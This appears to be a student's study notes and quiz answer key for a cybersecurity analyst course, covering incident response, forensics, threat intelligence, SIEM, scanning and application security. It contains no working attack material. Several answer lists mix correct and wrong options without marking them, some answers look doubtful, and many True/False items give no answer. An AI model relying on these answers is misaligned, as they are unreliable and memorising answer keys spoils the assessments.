True or False: The use of object-relational mapping (ORM) libraries is a dangerous practice that can help hackers conduct successful SQL Injection attacks.
Which of the following statements is True?
Injection attacks were ranked #1 on the OWASP Top 10 list in 2013 and again in 2017.
Which vulnerability is being exploited in an OS Command Injection attack?
Poor user input sanitation and unsafe execution of OS commands.
What is a simple but effective way to protect against DLL hijacking?
use absolute paths
True or False: Safe coding practice runs code with the least possible privilege.
True or False: Safe coding practice always specifies relative paths when running applications or using shared libraries.
True or False: Safe coding practice does not let user input reach an OS command unchanged.
A hacker exfiltrating data by injecting an HTTPrequest command is an example of which type of SQL Injection attack?
Out of Band
Protecting against SQL Injection attacks by sanitizing user input can be accomplished by which two (2) of the following techniques?
Use of whitelists.
Use of mapping tables.
True or False: Limiting database user permissions is an ineffective strategy in preventing SQL Injection attacks since the injected code will run directly against the database regardless of the permission levels that have been set.
Which of the following will help reduce the SQL Injection attack surface?
Use of stored procedures.
When developing an application, using NoSQL instead of MySQL will have what effect on the applications susceptibility to SQL Injection attacks?
Reduce the attack surface, but not eliminate it
Penetration Testing, Incident Response and Forensics
General Methodology
Planning
Setting Objectives
Informing Need-to-know employees
Discovery
Vulnerability scanning
Passive-Online
Wire sniffing
MitM
Replay attack
Active-Online
password brute-forcing
Network mapping
port scanning
trojan/spyware/keyloggers
hash injection (NTLM, LanMan)
Phishing
Offline Attacks
Pre-Computed hashes
Distributed Network Attack (DNA), password cracker
Rainbow
Tech-less
Social engineering
Shoulder surfing
Dumpster diving
Attack
Exploited vulnerabilities
misconfigurations
kernel flaws
insufficient input validation
symbolic links
file descriptor attacks
race conditions
buffer overflows
incorrect file and directory permissions
Report
Executive Summary
Background
Overall posture
risk ranking
general findings
recommendations
roadmap
30,60,90 day plan
Incident Response
General
Event -> Incident
Team Models: Central, Distributed, Coordinating
Common Attack Vectors
External/Removable Media
Attrition
Web
Email
Impersonation
Loss or Theft of Equipment
Baseline Questions; help coordinate with other teams and the media
Who attacked you? Why?
When and how did it happen?
Did this happen because you have poor security processes?
How widespread is the incident?
What steps are you taking to determine what happened and prevent future occurrences?
What is the impact? Any PII exposed? Estimated cost of incident?
Incident Response Continued
Phases
Preparation
IR Team, roles, means, tools, resources, policy testing, action plan
Risk assessment, network security, user awareness, host security, malware prevention
What types of events should trigger investigation?
What assets do we have?
Detection & Analysis
Precursor: sign incident may occur in future
e.g. log shows vulnerability scanning going on
Indicator: a sign that an incident may have occurred or may be occurring now
e.g. unusual deviation from typical network flow
Monitoring Systems
IDS vs IPS
DLP
SIEM
Documentation
current status, summary, indicators, related incidents, actions taken, chain of custody if applicable, impact assessments, contact info, evidence gathered, comments from incident handlers, next steps to be taken
Functional Impact Categories
None, Low, Medium, High: effect on ability to provide services to users
Information Impact Categories
None, Privacy Breach, Proprietary Breach, Integrity loss
Recoverability Effort Categories
Regular, Supplemented, Extended, Not Recoverable
Notifications
CIO, Local and Head of InfoSec, other incident response teams in or out of the org, system owner, HR, Public Affairs, legal department, law enforcement if appropriate
Containment, Eradication & Recovery
Containment: decision making is easier with predetermined procedures
Potential damage to and theft of resources
need for evidence preservation
service availability
time and resources needed to implement the strategy
effectiveness of the strategy
duration of the solution
Forensics in IR
Capture a backup image of the system as-is
Gather evidence
Follow chain of custody protocols
Eradication & Recovery
Deleting malware, disabling breached accounts, identifying and mitigating all vulnerabilities
Restoring systems from clean backups, rebuilding systems from scratch, replacing compromised files with clean versions, patching, changing passwords, tightening network perimeter security
high level of testing and monitoring are often deployed to ensure restored systems are no longer impacted by the incident. This could take weeks or months depending on how long it takes to bring back compromised systems into production.
Checklist
Can problem be isolated? Are all affected systems isolated from non-affected systems? Have forensic copies of affected systems been created for further analysis?
If possible can the system be reimaged and then hardened with patches and/or other countermeasures to prevent or reduce the risk of attacks? Have all malware and other artifacts been removed, and systems hardened?
What tools are you goin got use to test, monitor, and verify that the systems being restored to productions are not compromised by the same methods that caused the original incident?
Post-incident Activity
Retrospective: what happened at what times? What info was needed sooner? Were procedures adequate? What could be done differently? Could communication be improved?
Utilizing data collected
Evidence retention
Documentation
Incident Response Demo
Common Threats
Software Attacks
Data exfiltration
Information Sabotage
Theft of equipment
Attack Vectors
Website hosting malicious content, countered by:
Qradar
McAfee ePolicy Orchestrator
Next generation firewalls
Questions
Which three (3) of the following are phases of an incident response?
Containment, Eradication & Recovery
Preparation
Detection & Analysis
Which statement is true about an event?
An event may be totally benign, like receiving an email.
True or False: A robust automated incident response system should be able to detect and prevent loss from all incidents.
A good automated Incident Response system should be able to detect which three (3) of these common attack vectors?
An email phishing attack.
An unauthorized removable drive being attached to the network.
A brute force hacking attack.
A former employee using his knowledge at a competitor company.
Which three (3) of the following are components of an Incident Response Policy?
IR Awareness training.
Means, tools and resources available.
Identity of IR team members.
IR Policy testing responsibility.
Contact information, Smart phones, and Secure storage facilities all belong to which Incident Response resource category?
Incident Handler Communications and Facilities.
Which three (3) of the following would be considered an incident detection precursor?
Detecting the use of a vulnerability scanner
An application log showing numerous failed login attempts from an unknown remote system.
A vendor notice of a vulnerability to a product you own.
An announced threat against your organization from an activist group.
True or False: The Incident Response team should keep their documentation as concise as possible so only the most important facts take up the attention of the team leadership.
What is the proper classification for a data breach that resulted in the exposure of sensitive personally identifiable information (PII)?
Privacy Breach
What is the proper classification for the recovery effort from a breach if you can estimate the total effort required but it will require bringing in additional resources?
Supplemented
During which stage of a comprehensive Containment, Eradication & Recovery strategy does NIST recommend considering the following: Potential damange to and theft of resources, Need for evidence preservation, and Service availability?
Containment
Which Post Incident activity would include ascertaining exactly what happened and at what times?
Lessons learned meeting
Which statement is true about an incident?
An incident is an event that negatively affects IT systems.
True or False: A Coordinating Incidents Response Team provides advice and guidance to the Distributed IR teams in each department, but generally does not have specific authority over those teams.
Which Incident Response Team model describes a team that has authority over all aspects of IR within the entire organization?
Central
In what way will having a set of predefined baseline questions will help you in the event of an incident?
Coordinate with other teams and the media.
Incident Response team resources can be divided into which three (3) of the following categories?
Incident Analysis Hardware and Software
Incident Analysis Resources
Incident Handler Communications and Facilities
Port lists, Documentation, and Cryptographic hashes all belong to which Incident Response resource category?
Incident Analysis Hardware and Software
Incident Handler Communications and Facilities
Incident Analysis Resources
Incident Post-Analysis Resources
Which three (3) of the following would be considered an incident detection indicator?
The discovery of a file containing unusual characters by a system administrator.
Detecting the use of a vulnerability scanner.
A significant deviation from typical network traffic flow patterns.
An application log showing numerous failed login attempts from an unknown remote system.
Which type of monitoring system analyzes logs and events in real time?
SIEM
True or False: Highly detailed and thorough documentation is needed to support the analysis of current and future incidents.
What is the proper classification for a breach that results in sensitive or proprietary information being changed or deleted.
Integrity loss
What is the proper classification for the recovery effort from a breach if sensitive data was stolen and posted on a public web site?
Not Recoverable
During which stage of a comprehensive Containment, Eradication & Recovery strategy does NIST recommend considering the following: Eliminate components of the incident, Disable compromised accounts, and Identify and mitigate vulnerabilities?
Eradication
Which Post Incident activity would include reviewing response times, which systems were impacted and other metrics associated with the incident?
Utilizing collected data
Digital Forensics
Types of Data
CDs/DVDs
Internal/External drives
Volatile data
Network activity
Application usage
Portable digital devices
externally owned property
computer at home office
alternate sources of data
logs
keystroke monitoring
Objectives
Recover, analyze, preserve materials; in format useful as evidence in court of law
design procedures to ensure evidence is not corrupted
data acquisition and duplication
identify quickly, estimate potential impact
produce forensic report
preserve evidence by following chain of custody
Process
Collection
Develop plan
acquire
verify integrity; hashes
Examination
Bypassing controls: data compression, encryption, ACLs
Sea of Data: hundreds of thousands of files, not all relevant
Tools: filter and exclude data from searches
Analysis
putting the pieces together
IDS log, link event to host, host audit logs linking event to user account, host IDS log indicating what actions user performed
Reporting
If it's not in the report, you cannot testify about it.
Must detail the basis for your conclusions
Detail every test conducted, the methods and tools used, and results
Report Composition
Overview/Case Summary
Forensic Acquisition & Examination Preparations
Findings and Report (analysis)
Conclusion
SANS Institute Best Practices
screenshots
bookmark evidence via forensic app
built-in logging options within forensic tool
highlight and export data items into CSV or TXT files
digital audio recorder vs handwritten notes
Forensic Data
What's not there
Deleted files: pointer deleted, file might still exist
Slack space: if a file requires less space than the file allocation unit size, an entire file allocation unit is still reserved for the file
Free space: area on media that is not allocated to any partition may still contain pieces of data
MAC data
modification time, access time, creation time
Logical Backup vs Imaging
Logical: copies the directories and files of a logical volume, no deleted files or residual data stored in slack space
Imaging: bit-for-bit copy of original media
disk-to-disk or disk-to-file
should not be used on a live system since data is always changing
Tools for Techniques
File viewers
uncompressing files
GUI for data structures
identifying known files
string searches and pattern matches
metadata
Operating System Data
Collection & Prioritization of Volatile Data
slack space, free space, network config/connections, running processes, open files, login sessions, operating system time
Collecting non-volatile data
types: config files, logs, app files, data files, swap files, dump files, hibernation files, temp files
Power-Down options, File system data collected, users and groups, passwords, network shares, logs
Logs
network hack: collect logs of all network devices in route
unauthorized access: save web server logs, app server logs, app logs, router or switch logs, firewall logs, database logs, IDS logs, etc
trojan/worm/virus: save antivirus logs apart from the event logs (pertaining to the antivirus)
Windows
Recycle Bin, Registry, Thumbs.db, Files, Browser History, Print Spooling
MacOS
has forensic duplicate technique: Target Disk Mode
Linux
/etc/config
/etc/passwd
/var/log
/home/$USER
Application Data
Application Components
Config Settings
Config File
Runtime Options
Added to Source Code
Authentication
External
Proprietary
Pass-through
Host/user Environment
Logs
Event
Audit
Error
Installation
Debugging
Data
can live in memory or permanent files
file format can be generic or proprietary
may be in databases
some apps create temp files during session or improper shutdown
Supporting Files
Docs
Links
Graphics
App Architecture
Local
Client/Server
Peer-to-Peer
Types of Apps
Email
Web Usage
Web Data from Host
Favorite sites
History w/ timestamps of sites visited
cached web data files
cookies
Web Data from Server
Timestamps
IP addresses
Web Browser version
Type of request
Resource requested
Interactive messaging
IRC, IM, VoIP
File Sharing
Document usage
Security apps
Data Concealment tools
Network Data
Sources
Firewalls and Routers
Packet Sniffers and Protocol Analyzers
Intrusion Detection System
Security Event Management Software
Network Forensic Analysis Tools
Remote Access
Data Value
IDS: starting point for finding malicious activity
SEM: automatically bringing together multiple sources of information and presenting useful info
NFAT - Network Forensic Analysis Tool
Firewalls, Routers, Proxy Servers, & RAS
DHCP Servers: timestamps, who was using what IP when
Packet Sniffers: huge sea of info
Network Monitoring: finding variations from normal traffic flows
ISP records: useful to determine attacker
Attacker Identification
Contact IP Address Owner
Send Network Traffic - not recommended for orgs
Application Content - data packets could contain info of attacker's identity
Seek ISP assistance - requires court order and is done only to assist in the most serious of attacks
History of IP address - look for trends of suspicious activity
Questions
Digital forensics can be defined as the application of science to the identification, collection, examination, and analysis of data.
According to NIST, a forensic analysis should include four elements, Places, Items, Events and what?
People
True or False. Digital forensics report must contain details of every test conducted, the methods and tools used, and the results.
Which section of a digital forensics report would contain a list of the steps you have taken to insure the integrity of the evidence?
Forensic Acquisition & Examination Preparation
Network activity, Application usage, Logs and Keystroke monitoring are all sources of what?
Data
What are the three (3) main hurdles that must be overcome when examining data? (Select 3)
Dealing with a sea of data. A single hard drive will contains many thousands of files that are not relevant to our investigation.
Selecting the most effective tools to help with the searching and filtering of data.
Bypassing controls such as operating system and encryption passwords.
True of False. Only data files can be effectively analyzed during a forensic analysis.
Most data files are smaller than the number of blocks allocated to their storage by the file system, the unused spaces is known as what?
Slack space
True or False. When collecting forensic data from a running system, you should always attempt to collect volatile data first.
Which of these applications would likely be of the most interest in a forensic analysis?
Patch files
Operating system DLLs
Email
OSI Application Layer protocols
Digital forensics is commonly applied to which of the following activities?
Criminal investigation
Incident handling
Data recovery
All of the above
NIST includes which three (3) as steps in collecting data? (Select 3)
Acquire the data
Develop a plan to acquire the data
Verify the integrity of the data
Normalize the data
What is the primary purpose of maintaining a chain of custody?
To avoid allegations of mishandling or tampering of evidence.
True or False. Digital forensics had been used to solve a number of high-profile violent crimes.
True or False. Digital forensics report is a summary of your findings. If your case goes to trial, your testimony can, and usually does, involve far more detail than is in the report.
Which section of a digital forensics report would include using the best practices of taking lots of screenshots, use built-in logging options of your digital forensics tools, and exporting key data items into a .csv or .txt file?
Findings & Analysis
Which types of files are appropriate subjects for forensic analysis?
Data files
Image and video files
Application files
All of the above
Deleting a file results in what action by most operating systems?
The memory registers used by the file are marked as available for new storage but are otherwise not changed.
Forensic analysis should always be conducted on a copy of the original data. What type of copying is appropriate for getting data from a live system that cannot be taken offline?
A logical backup
How does a forensic analysis use hash sets acquired from NIST's Software Reference Library project?
They can quickly eliminate known good operating system and application files from consideration.
Which three (3) of the following data types are considered non-volatile? (Select 3)
Dump files
Free space
Swap files
Logs
Configuration files are considered which data type?
Non-volatile
Which three (3) of the following are application components? (Select 3)
Application architecture
Authentication mechanisms
OSI Application Layer protocols
Data files
Which of these applications would likely be of the least interest in a forensic analysis?
Patch files
The Internet layer of the TCP/IP stack, also known as the Network layer in the OSI model, contains which two (2) protocols that are very useful to a forensic investigation? (Select 2)
UDP
ICMP
IPv4 / IPv6
LDAP
Which device would you inspect if you were looking event data correlated across a number of different network devices?
Firewall
Which of these sources might require a court order in order to obtain the data for forensic analysis?
ISP records
Scripting
How many spaces must be used to indent a block of code in Python?
Any number 1 or more as long as the same indentation is used within a code block.
Cyber Threat Intelligence
Threat Intelligence
Security Drivers
breached records
human error
iot innovation
breach cost amplifiers (3rd parties, cloud migration, system complexity)
skills gap
$3.92M total cost of a data breach
Insider Threats
Questions
Which three (3) of these were among the top 5 security drivers in 2019? (Select 3)
New security and privacy laws that went into effect in 2019
Human error accounting for the majority of security breaches
The number of breached records in 2019 more than 3 times that of 2018
IOT device attacks moving from targeting consumer electronics to targeting enterprise devices
What was the average cost of a data breach in 2019 in US dollars?
$3.92M
What was the average size of a data breach in 2019?
25575 records
According to the Threat Intelligence Strategy Map, The threat intelligence process can be broken down into 4 steps: Collect, Process, Analyze, and Share. Which step would contain activities such as gathering data from internal, external, technical and human sources?
Collect
Crowdstrike organizes threat intelligence into which three (3) areas? (Select 3)
Operational
Strategic
Tactical
According to the Crowdstrike model, Endpoints, SIEMs and Firewalls belong in which intelligence area?
Tactical
Which three (3) sources are recommended reading for any cybersecurity professional? (Select 3)
DarkReading
Trend Micro
BleepingComputer
Which two (2) of these were among the 4 threat intelligence platforms covered in the Threat Intelligence Platforms video? (Select 2)
FireEye
Recorded Future
True or False. The average enterprise has 85 different security tools from 45 vendors.
Which threat intelligence framework can be described as a system that is effective if there are only 2 players and the adversary is motivated by socioeconomic or sociopolitical payoffs?
Diamond Model of Intrusion Analysis
True or False. An organization's security immune system should not be considered fully integrated until it is integrated with the extended partner ecosystem.
Which term can be defined as "The real-time collection, normalization, and analysis of the data generated by users, applications, and infrastructure that impacts the IT security and risk posture of an enterprise"?
Security Intelligence
What are the three (3) pillars of effective threat detection? (Select 3)
See everything
Become proactive
Automate intelligence
True or False. According to the FireEye Mandiant's Security Effectiveness Report 2020, organizations have an average of 50-70 security tools in their IT environments.
What was the average time to identify and contain a breach in 2019?
279 days
Which industry had the highest average cost per breach in 2019 at $6.45M
Healthcare
Breaches caused by which source resulted in the highest cost per incident in 2019?
Credentials theft
According to the Threat Intelligence Strategy Map, The threat intelligence process can be broken down into 4 steps: Collect, Process, Analyze, and Share. Which step would contain activities such as normalize, correlate, confirm and enrich the data?
Process
According to the Threat Intelligence Strategy Map, The threat intelligence process can be broken down into 4 steps: Collect, Process, Analyze, and Share. Which step would contain activities such as investigate, contain, remediate and prioritize?
Analyze
According to the Crowdstrike model, threat hunters, vulnerability management and incident response belong in which intelligence area?
Operational
Which three (3) sources are recommended reading for any cybersecurity professional? (Select 3)
X-Force Exchange
InfoSecurity Magazine
Krebs on Security
Which two (2) of these were among the 4 threat intelligence platforms covered in the Threat Intelligence Platforms video? (Select 2)
TruSTAR
IBM X-Force Exchange
Which threat intelligence framework is divided into 3 levels. Level one is getting to know your adversaries. Level 2 involves mapping intelligence yourself and level 3 where you map more information and used that to plan your defense?
Mitre Att&ck Knowledgebase
True or False. An organization's security immune system should be isolated from outside organizations, including vendors and other third-parties to keep it from being compromised.
Activities performed as a part of security intelligence can be divided into pre-exploit and post-exploit activities. Which two (2) of these are pre-exploit activities? (Select 2)
Prioritize vulnerabilities to optimize remediation processes and close critical exposures
Detect deviations from the norm that indicate early warnings of APTs
Gather full situational awareness through advanced security analytics
Perform forensic investigation
True or False. According to the FireEye Mandiant's Security Effectiveness Report 2020, more that 50% of successful attacks are able to infiltrate without detection.
Data Loss Prevention and Mobile Endpoint Protection
A student's grades should be visible to that student when she logs in to her university account. Her ability to see her grades is an example of which aspect of the CIA Triad?
Availability
A university has implemented practices that ensures all student data is encrypted while stored on university servers. Which aspect of the CIA Triad does this practice support?
Confidentiality
The Student Portal of a university issues a confirmation code with a hash value each time a student submits an assignment using the portal. This is an example of which aspect of the CIA Triad?
Integrity
True or False. An organization has "air gapped" its small network of critical data servers so they are accessible internally but not to any external system. These systems are now safe from a deliberate attack.
C-level executives face 4 challenges when assuring their organizations maintain a comprehensive, workable data security solution. The proliferation of smartphones used for work would impact which two (2) of these concerns the most? (Select 2)
New privacy regulations
Explosive data growth
True or False. An organization is subject to both GDPR and PCI-DSS data security regulations and has dedicated all of its efforts in remaining in compliance with these 2 sets of regulations. They are correct in believing that their data is safe.
True or False. A newly hired CISO made the right choice when he moved the Known Vulnerabilities list to a high priority for his team to resolve even though none of these had ever been exploited on the company's network to-date.
All industries have their own unique data security challenges. Which of these industries has a particular concern with HIPAA compliance and the highest cost per breached record?
Healthcare
All industries have their own unique data security challenges. Which of these industries has a particular concern with being targeted more than any other by cybercriminals "because that is where the money is"?
Financial
Which three (3) of these are among the top 12 capabilities that a good data security and protection solution should provide? (Select 3)
Data discovery
Blocking, masking and quarantining
Data risk analysis
Parsing discovered data against known patterns or key words is a process known as what?
Data classification
Which data protection process takes data activity monitoring output and uses it to generate insights about threats?
Active analytics
True or False. The Guardium administrator needs to be someone with the highest level of access to the data being protected?
Which mobile operating system runs the majority of smartphones today?
Android
Which mobile operating system runs approximately 60% of tablet computers worldwide?
iOS
True or False. Security is enhanced on iOS mobile devices because users typically cannot interact directly with the operating system.
Which statement best describes the use of anti-virus software on mobile devices?
Antivirus software can "see" the apps that are running on a mobile device but cannot see the data that is associated with each app.
Which type of threat is Jailbreaking?
System based
On a mobile device, which type of threat is a phishing scam?
App based
True or False. An operator who corrupts data by mistake is considered an "inadvertent attack" that should be considered when developing data protection plans.
C-level executives face 4 challenges when assuring their organizations maintain a comprehensive and workable data security solution. GDPR, CCPA, and PCC-DSS are concerned with which one of these challenges?
New privacy regulations
True of False. A biotech research company with a very profitable product line has grown so rapidly it has acquired a marketing company, a small IT services company and a company that specializes in pharmaceutical manufacturing and distribution. The CEO of the parent company made a good decision when he decided not to consolidate all data security under a single CISO, believing that each of the new divisions understands its own data security needs better than the parent company possibly could.
What are the 5 common pitfalls of data security?
Failure to move beyond compliance
Failure to recognize the need for centralized data security
Failure to define who owns responsibility for the data itself
Failure to address known vulnerabilities
Failure to prioritize and leverage data activity monitoring
All industries have their own unique data security challenges. Which of these industries has a particular concern with a widely distributed IT infrastructure that must provide services across a multiple government jurisdictions while not violating the privacy concerns of its users?
Transportation
Which three (3) of these are among the top 12 capabilities that a good data security and protection solution should provide? (Select 3)
Data classification
Encryption
Data and file monitoring
Which is the data protection process that addresses inappropriate privileges, insecure authentication methods, account sharing, configuration files and missing security patches?
Vulnerability assessment
Which data protection process substitutes key data with a token that is issued by a trusted third-party where the token can be accessed but not redeemed by an untrusted party?
Tokenization
Scanning
Which component of a vulnerability scanner would perform security checks according to its installed plug-ins?
Engine Scanner
Which component of a vulnerability scanner stores vulnerability information and scan results?
Database
How does a vulnerability scanner detect internal threats?
By scanning hosts
In which component of a Common Vulnerability Score (CVSS) would the attack vector be reflected?
Base-Exploitability Subscore
In which component of a Common Vulnerability Score (CVSS) would confidentiality be reflected?
Base-Impact Subscore
In which component of a Common Vulnerability Score (CVSS) would exploit code maturity be reflected?
Temporal Score
True or False. The US Dept of Defense has produced a number of Security Technical Implementation Guides to show the most secure ways to deploy common software packages such as operation systems, open source software, and network devices. These guides are available to the public and can be freely downloaded.
The Center for Internet Security (CIS) has implementation groups that rank from the least secure to the most secure. Which of these has the least stringent security requirements?
a) CIS Sub-Controls for small, commercial off-the-shelf or home office software environments.
b) CIS Sub-Controls focused on helping security teams manage sensitive client or company information.
c) CIS Sub-Controls that reduce the impact of zero-day and targeted attacks from sophisticated adversaries.
Which three (3) of these is identified by a basic port scanner? (Select 3)
Available services provided by the target system
A list of Open ports on a target system
Active hosts using TCP
Port numbers 49152 through 65535 are known as what?
Dynamic and Private Ports
What are the three (3) responses a port scanner might receive when it is scanning a system for open ports? (Select 3)
Open
Filtered (or blocked)
Closed
Which type of scan is commonly used to check if a working system is at the address indicated and that it is responding?
Ping (ICMP Echo Request)
Which type of scan sends an empty packet or packet with a different payload for each port scanned. A response is received only for closed ports?
UDP port scan
Which two (2) of these are other names for a protocol analyzer? (Select 2)
Packet analyzer
Network analyzer
Which is the most popular packet sniffer used?
WireShark
Ports 0–1023 – system or well-known ports
Ports 1024–49151 – user or registered ports
Ports 49152–65535 – dynamic / private / ephemeral ports
Which type of scan notes the connection but leaves the target hanging, i.e. does not reveal any information to the target about the host that initiated the scan?
TCP/Half Open Scan (aka a SYN scan)
Which two (2) of these are other names for a protocol analyzer? (Select 2)
Traffic analyzer
Sniffer
True or False. Packet sniffers are used by hackers but have no legitimate place in legitimate network management.
Which component of a vulnerability scanner provides high-level graphs and trend reports for executive leadership?
Report Module
How does a vulnerability scanner detect external threats?
By scanning internet facing hosts from the Internet
If a port is blocked, what response will be sent to the port scanner?
There will be no response
Application and Security Testing
Enterprise Architecture
considers the needs of the whole enterprise within scope (org or department)
maps the main components of the problem space at a very high level
Solution Architecture
describes the main elements, showing internal architecture, stored data, and the use of components/patterns
Architectural Building Blocks (ABBs) and Solution Building Blocks (SBBs)
ABB
Data Sec, AppSec, IAM, Infrastructure and Endpoint Sec, Detect and Respond
SBB
Key Security Manager, Certificate Authority, HSM, WAF, SAST, Directory, Privilege Access Manager, Hardware Token, Virus protection, App firewall, SPAM filter, Network intrusion prevention system, incident workflow manager'
True or False. A security architect's job is to make sure that security considerations dominate other design aspects such as usability, resilience and cost.
Which of these is an aspect of an Enterprise Architecture?
Considers the needs of the entire organization
Which of these is an aspect of a Solution Architecture?
Describes how specific products or technologies are used
Which three (3) of these are general features of Building Blocks? (Select 3)
May be product or vendor aware
Defined boundary, but can work with other building blocks
Could be an actor, business service, application or data
Package of function defined to meet a business need
In security architecture, a reusable solution to a commonly recurring problem is known as what?
a pattern
What is lacking in a security architecture pattern that prevents it from being used as a finished design?
context
What are the possible consequences if a bug in your application becomes known?
It is embarrassing to your company
Financial losses via lawsuits and fines can be very significant
Government agencies can impose fines and other sanctions against your company
All of the above
Failure to use input validation in your application introduces what?
A vulnerability
Which software development lifecycle is characterized as a top-down approach where one stage of the project is completed before the next stage begins?
Waterfall
Which form of penetration testing allows the testers complete knowledge of the systems they are trying to penetrate in advance of their attack to simulate an internal attack from a knowledgeable insider?
White Box testing
Which application testing method requires access to the original application source code?
SAST: Static Application Security Testing
Which three (3) steps are part of a Supplier Risk Assessment? (Select 3)
Identify mitigations that would minimize or eliminate the risk
Identify how the risk would impact the business
Identify how any risks would impact your organization's business
Determine the likelihood the risk would interrupt the business
What type of firewall should you install to protect applications used by your organization from hacking?
WAF
Which of these threat modeling methodologies was introduced in 1999 at Microsoft to provide their developer’s a mnemonic that would help them find security vulnerabilities in their products?
STRIDE
What was the ultimate consequence to Target Stores in the United States from their 2013 data breach in which over 100M records were stolen?
Costs of $10M and reputational damage only.
Select the two (2) top vulnerabilities found in common security products. (Select 2)
Cross-site request forgery
Cross-site scripting
True or False. If you can isolate your product from the Internet, it is safe from being hacked.
Which three (3) things can Cross-site scripting be used for?
Take over sessions
Steal cookies
Break encryption
Harvest credentials
True or False. Commonly a Reflect XSS attack is sent as part of an Email or a malicious link and affects only the the user who receives the Email or link.
Cross-site scripting attacks can be minimized by using HTML and URL Encoding. How would a browser display this string?: <b>Password</b>
<b>Password</b>
Which three (3) statements about whitelisting user input are true?
Special characters should only be allowed on an exception basis
Whitelisting reduces the attack surface to a known quantity
Whenever possible, input should be whitelisted to alphanumeric values to prevent XSS
Which two (2) statements are considered good practice for avoiding XSS attacks?
Use strict whitelists on accepting input
Encode all data output as part of HTML and JavaScript
How would you classify a hactivist group who thinks that your company's stance on climate change threatens the survival of the planet?
a threat
Which software development lifecycle is characterized by short bursts of analysis, design, coding and testing during a series of 1 to 4 week sprints?
Agile and Scrum
Which software development lifecycle is characterized by a series of cycles and an emphasis on security?
Spiral
Which application testing method requires a URL to the application, is quick and cheap but also produces the most false-positive results?
DAST: Dynamic Security Application Testing
Which type of application attack would include buffer overflow, cross-site scripting, and SQL injection?
input validation
Which type of application attack would include unauthorized access to configuration stores, unauthorized access to administration interfaces and over-privileged process and service accounts?
Configuration management
Which one of the OWASP Top 10 Application Security Risks would be occur when authentication and session management functions are implemented incorrectly allowing attackers to compromise passwords, keys or session tokens.
Broken authentication
Which one of the OWASP Top 10 Application Security Risks would be occur when restrictions on what a user is allowed to do is not properly enforced?
Broken access control
Which of these threat modeling methodologies is integrated seamlessly into an Agile development methodology?
VAST
Which phase of DevSecOps would contain the activities Secure application code, Secure infrastructure configuration, and OSS/COTS validation?
Code & build
Which phase of DevSecOps would contain the activities Detect & Visualize, Respond, and Recover?
Operate & monitor
The Deploy step in the DevSecOps Release, Deploy & Decommission phase contains which of these activities?
Versioning of infrastructure
Creation of Immutable images
Data backup cleansing
IAM controles to regulate authorization
The Respond step in the DevSecOps Operate & Monitor phase contains which of these activities?
Root Cause Analysis
Inventory
Chaos engineering
Virtual Patching
SIEM Platforms
Core Duties
Log Collection
Normalization
Correlation
Aggregation
Reporting
A SIEM system collects logs and other security documentation for analysis
The core function is to manage network security by monitoring flows and events
It consolidates log events and network flow data from thousands of devices, endpoints and applications distributed throughout a network
A SIEM system can be rules-based or employ a statistical correlation engine to establish relationships between event log entries
Captures log event and network flow data in near real time and apply advanced analytics to reveal security offenses
It can be available on prem and in a cloud environment
True or False. SIEMs capture network flow data in near real time and apply advanced analytics to reveal security offenses.
Which of these describes the process of data normalization in a SIEM?
Turns raw data into a format that has fields that SIEM can use
True or False. A SIEM considers any event that is anomalous, or outside the norm, to be an offense.
True or False. A large company might have QRadar event collectors in each of their data centers that are configured to forward all collected events to a central event processor for analysis.
The triad of a security operations centers (SOC) is people, process and technology. Which part of the triad would vendor-specific training belong?
People
True or False. Information is often overlooked simply because the security analysts do not know how it is connected.
The partnership between security analysts and technology can be said to be grouped into 3 domains, human expertise, security analytics and artificial intelligence. The human expertise domain would contain which three (3) of these topics?
Morals
Common sense
Generalization
A robust cybersecurity defense includes contributions from 3 areas, human expertise, security analytics and artificial intelligence. Which of these areas would contain the ability for abstraction?
Human expertise
True or False. SIEMs can be available on premises and in a cloud environment.
For a SIEM, what are logs of specific actions such as user logins referred to?
Events
Which of these describes the process of data normalization in a SIEM?
Indexes data records for fast searching and sorting
When a data stream entering a SIEM exceeds the volume it is licensed to handle, what are three (3) ways the excess data is commonly handled, depending upon the terms of the license agreement? (Select 3)
The data stream is throttled to accept only the amount allowed by the license
The excess data is stored in a queue until it can be processed
The excess data is dropped
The data is processed and the license is automatically bumped up to the next tier.
Which five (5) event properties must match before the event will be coalesced with other events? (Select 5)
Destination IP
Source Port
Destination Port
Source IP
Username
QID
What is the goal of SIEM tuning?
To get the SIEM to sort out all false-positive offenses so only those that need to be investigated are presented to the investigators
True or False. QRadar event collectors send all raw event data to the central event processor for all data handling such as data normalization and event coalescence.
The triad of a security operations centers (SOC) is people, process and technology. Which part of the triad would containment belong?
Process
True or False. There is a natural tendency for security analysts to choose to work on cases that they are familiar with and to ignore those that may be important but for which they have no experience.
Threat Hunting
Cyber threats pose many challenges to organizations today. Which three (3) of these are among those cited? (Select 3)
There is a cybersecurity skills shortage
It takes an average of 191 days to even detect an attack has occurred
Almost half of the breaches are caused by malicious or criminal acts
What percent of security leaders reported that threat hunting increased the speed and accuracy of response in detection of advanced threats?
91%
While 80% of the threats are known and detected, the 20% that remains unknown account for what percent of the damage?
80%
True or False. The skill set of a cyber threat hunter is very different from that of a cybersecurity analyst and many threat hunters a have backgrounds doing intelligence work.
True or False. A cyber threat hunting team generally sits at the center of the SOC Command Center.
There is value brought by each of the IBM i2 EIA use cases. Which one of these delivers net new discovery of correlating low level alerts and offenses?
Cyber Threat Hunting
What is one thing that makes cybersecurity threats so challenging to deal with?
There is a big shortage in cyber security skills and many job openings unfilled
The level 3 and 4 cybersecurity analysts working in a Security Operations Center (SOC) combat cyber crime by performing which type of activity?
Cyber forensic investigations
True or False. If you have no better place to start hunting threats, start with a view of your own organization then work your way up to an industry view and then a regional view, a national view and finally a global view of the threat landscape.
True or False. A cyber threat hunting team generally sits outside the SOC command center.
There is value brought by each of the IBM i2 EIA use cases. Which one of these identifies net new money chain transfers?
Fraud Investigations
Cybersecurity Capstone: Breach Response Case Studies
Incident Management Response and Cyberattack Frameworks
IRIS FRAMEWORK
In creating an incident response capability in your organization, NIST recommends taking 6 actions. Which three (3) actions are included on that list? (Select 3)
Establish a formal incident response capability
'Develop an incident response plan based on the incident response policy
'Create an incident response policy
Which incident response team model would best fit the needs of a small company that runs its business out of a single office building or campus?
Central incident response team
True or False. An incident response team needs a blend of members with strong technical and strong soft skills?
Assuring systems, networks, and applications are sufficiently secure to resist an attack is part of which phase of the incident response lifecycle?
Preparation
According to the IRIS Framework, during which stage of an attack would the attacker conduct external reconnaissance, alight tactics, techniques and procedures to target and prepare his attack infrastructure?
Attack beginnings
According to the IRIS Framework, during which stage of an attack would the attacker escalate evasion tactics to evade detection?
Continuous phases occur
